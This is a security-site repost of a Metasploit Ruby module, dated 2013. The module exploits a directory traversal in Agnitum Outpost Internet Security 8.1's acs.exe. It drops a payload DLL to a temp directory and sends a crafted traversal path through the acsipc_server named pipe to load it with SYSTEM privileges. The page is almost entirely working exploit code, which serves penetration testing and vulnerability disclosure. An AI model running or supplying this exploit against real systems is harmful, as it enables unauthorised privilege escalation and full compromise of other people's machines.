首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Agnitum Outpost Internet Security Local Privilege Escalation
来源:metasploit.com 作者:vazquez 发布时间:2013-09-18  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
  
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'
  
class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking
  
  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Exploit::FileDropper
  
  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Agnitum Outpost Internet Security Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability on Agnitum Outpost Internet
        Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load
        load arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary
        code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with
        Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ahmad Moghimi', # Vulnerability discovery
          'juan vazquez' # MSF module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'Privileged'     => true,
      'Targets'        =>
        [
          [ 'Agnitum Outpost Internet Security 8.1', { } ],
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'OSVDB', '96208' ],
          [ 'EDB', '27282' ],
          [ 'URL', 'http://mallocat.com/a-journey-to-antivirus-escalation/' ]
        ],
      'DisclosureDate' => 'Aug 02 2013',
      'DefaultTarget'  => 0
    }))
  
    register_options([
      # It is OptPath becuase it's a *remote* path
      OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]),
      # By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\
      OptInt.new("DEPTH", [ true, "Traversal depth", 3 ])
    ], self.class)
  
  
  end
  
  def junk
    return rand_text_alpha(4).unpack("V").first
  end
  
  def open_named_pipe(pipe)
    invalid_handle_value = 0xFFFFFFFF
  
    r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)
  
    handle = r['return']
  
    if handle == invalid_handle_value
      return nil
    end
  
    return handle
  end
  
  def write_named_pipe(handle, dll_path, dll_name)
  
    traversal_path = "..\\" * datastore["DEPTH"]
    traversal_path << dll_path.gsub(/^[a-zA-Z]+:\\/, "")
    traversal_path << "\\#{dll_name}"
  
    path = Rex::Text.to_unicode(traversal_path)
  
    data = "\x00" * 0x11
    data << path
    data << "\x00\x00"
    data << "\x00\x00\x00"
  
    buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler
    buf << [0x17].pack("V") # command
    buf << [junk].pack("V")
    buf << [data.length].pack("V")
    buf << [0, 0, 0].pack("V*")
    buf << data
  
    w = client.railgun.kernel32.WriteFile(handle, buf, buf.length, 4, nil)
  
    if w['return'] == false
      print_error("The was an error writing to disk, check permissions")
      return nil
    end
  
    return w['lpNumberOfBytesWritten']
  end
  
  
  def check
    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
    if handle.nil?
      return Exploit::CheckCode::Safe
    end
    session.railgun.kernel32.CloseHandle(handle)
    return Exploit::CheckCode::Detected
  end
  
  def exploit
  
    temp_dir = ""
  
    print_status("Opening named pipe...")
    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
    if handle.nil?
      fail_with(Failure::NoTarget, "\\\\.\\pipe\\acsipc_server named pipe not found")
    else
      print_good("\\\\.\\pipe\\acsipc_server found! Proceeding...")
    end
  
    if datastore["WritableDir"] and not datastore["WritableDir"].empty?
      temp_dir = datastore["WritableDir"]
    else
      temp_dir = expand_path("%TEMP%")
    end
  
    print_status("Using #{temp_dir} to drop malicious DLL...")
    begin
      cd(temp_dir)
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Config, "Failed to use the #{temp_dir} directory")
    end
  
    print_status("Writing malicious DLL to remote filesystem")
    write_path = pwd
    dll_name = "#{rand_text_alpha(10 + rand(10))}.dll"
    begin
      # Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem
      write_file(dll_name, generate_payload_dll)
      register_file_for_cleanup("#{write_path}\\#{dll_name}")
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Config, "Failed to drop payload into #{temp_dir}")
    end
  
    print_status("Exploiting through \\\\.\\pipe\\acsipc_server...")
    bytes = write_named_pipe(handle, write_path, dll_name)
    session.railgun.kernel32.CloseHandle(handle)
  
    if bytes.nil?
      fail_with(Failure::Unknown, "Failed while writing to \\\\.\\pipe\\acsipc_server")
    end
  
  end
  
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sophos Web Protection Applianc
·HP ProCurve Manager SNAC Updat
·Sophos Web Protection Applianc
·HP ProCurve Manager SNAC Updat
·D-Link Devices UPnP SOAP Telne
·Vino VNC Server 3.7.3 - Persis
·PCMAN FTP 2.07 STOR Command -
·TeraCopy 2.3 (default.mo) Lang
·Ofilter Player 1.2.0.1 Buffer
·McKesson ActiveX File/Environm
·Mitsubishi MC-WorkX 8.02 Activ
·Western Digital Arkeia Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved